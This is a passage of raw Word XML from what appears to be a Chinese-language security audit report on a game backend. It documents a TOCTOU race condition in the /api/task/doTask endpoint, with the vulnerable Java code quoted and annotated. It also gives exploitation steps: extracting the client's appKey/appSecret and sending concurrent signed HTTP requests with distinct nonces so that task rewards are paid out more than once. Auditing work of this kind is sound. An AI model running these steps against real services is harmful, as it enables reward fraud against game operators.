        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">以高并发方式（如 10 个线程同时发送上述请求），利用 TOCTOU 窗口绕过去重检查，在数据库中写入多条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1007"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">正常登录获取有效 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Bearer Token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用并发工具（如 Apache Bench、JMeter、Burp Intruder 并发模式）以同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时发起 ≥2 个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/task/doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1009"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">检查 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user_task_record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 表中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的记录数是否 &gt; 1；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若后续任务完成/奖励接口遍历该用户的全部任务记录或按记录数计算奖励，则每条重复记录均可触发一次奖励发放，实现重复获益。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="101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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通注册用户，无需任何特殊权限</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013"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TaskExecutionController.java.doTask → TaskExecutionService.java.doTask → UserTaskRecordRepository.java.findByUserIdAndTaskId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audit_m222_873_doTask_ctrl-path1of7.md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：TaskExecutionService.java#doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_48" w:id="48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞47：任务注册接口竞态条件（TOCTOU）导致重复任务记录创建</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="101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doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 接口先查后写无并发保护，可并发绕过去重检查创建重复任务记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="101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src/main/java/com/gameBack/mjservice/service/TaskExecutionService.java:doTask</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="101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竞态条件（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="101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1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：普通登录用户（需要有效 Bearer Token + 有效请求签名）</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doTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法在判断用户任务记录是否已存在时，采用"先 SELECT 再 INSERT"的非原子操作模式。当多个并发请求携带相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（来自 Token，固定不变）和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时到达时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>两个或多个事务均可在各自的 `findByUserIdAndTaskId` 快照读中得到"空结果"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，进而均跳过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分支，各自执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userTaskRecordRepository.save(r)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，最终在数据库中产生多条 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">虽然方法上标注了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，但 MySQL InnoDB 默认隔离级别为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REPEATABLE READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（PostgreSQL 默认为 READ COMMITTED），在该级别下 MVCC 快照读只保证事务内重复读一致性，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并不阻止其他并发事务同时读取同一空状态后各自写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">；只有 SERIALIZABLE 隔离 + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT … FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或数据库级唯一约束才能阻断此路径，而当前代码均未采用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">游戏后端中任务记录与奖励发放密切相关，重复的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserTaskRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 记录可能导致：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1019"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">任务进度推进逻辑对同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(userId, taskId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 多次独立运算；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1020"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>任务完成奖励被重复发放（虚拟货币、道具、积分等）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1021"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>排行榜、任务统计数据被扭曲。</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 POST /api/task/doTask</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ SignAuthTestFilter（校验签名/nonce，但每个并发请求使用不同 nonce，均可通过）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ TokenAuthFilter（校验 Bearer Token，userId 从 Token 解析，不可伪造）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  ↓ TaskExecutionController.doTask</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  ↓ TaskExecutionService.doTask  ← TOCTOU 竞态窗口在此</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入口：TaskExecutionController.java</w:t>
              <w:br/>
              <w:t>// DoTaskForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Long taskId;  ← 任务ID，攻击者可指定任意合法任务</w:t>
              <w:br/>
              <w:t>@PostMapping("/doTask")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; doTask(@CurrentUserId Long userId,   // ← userId 来自 Token，安全</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                 @RequestBody DoTaskForm form) { // ← taskId 攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.doTask(userId, form.getTaskId());       // ← 污点传入 service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：TaskExecutionService.java</w:t>
              <w:br/>
              <w:t>@Transactional   // ← 仅保证单事务内原子性，不阻止并发事务并行执行</w:t>
              <w:br/>
              <w:t>public void doTask(Long userId, Long taskId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 快照读（MVCC）：T1 和 T2 并发时，两个事务均可在此读到"空结果"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserTaskRecord&gt; byUserIdAndTaskId =</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userTaskRecordRepository.findByUserIdAndTaskId(userId, taskId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    if (!byUserIdAndTaskId.isEmpty()) return;  // ← T1、T2 均为空，均跳过此 return</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserTaskRecord r = new UserTaskRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setUserId(userId);    // ← T1 写入</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTaskId(taskId);    // ← T2 同样写入，产生重复记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setCurrentProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setTargetProgress(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    r.setStatus(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userTaskRecordRepository.save(r);  // ← 漏洞点：两个事务均执行到此，重复 INSERT</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利用需并发发送两个（或更多）请求，每个请求携带独立的合法 nonce 和签名：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请求 1（线程 A）</w:t>
              <w:br/>
              <w:t>POST /api/task/doTask HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;current_timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;unique_nonce_1&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_sign_for_request_1&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{"taskId": &lt;target_task_id&gt;}</w:t>
              <w:br/>
              <w:br/>
              <w:t>---</w:t>
              <w:br/>
              <w:br/>
              <w:t># 请求 2（线程 B，与请求 1 同时发出）</w:t>
              <w:br/>
              <w:t>POST /api/task/doTask HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;valid_user_token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;app_key&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;current_timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;unique_nonce_2&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_sign_for_request_2&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"taskId": &lt;target_task_id&gt;}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1022"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用合法账号登录，获取有效 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">从客户端应用中提取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（客户端必然内嵌）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造两条携带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不同 nonce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（绕过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignNonceGuard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的重放检测）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>相同 `taskId`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、合法签名的请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1025"/>
        </w:numPr>
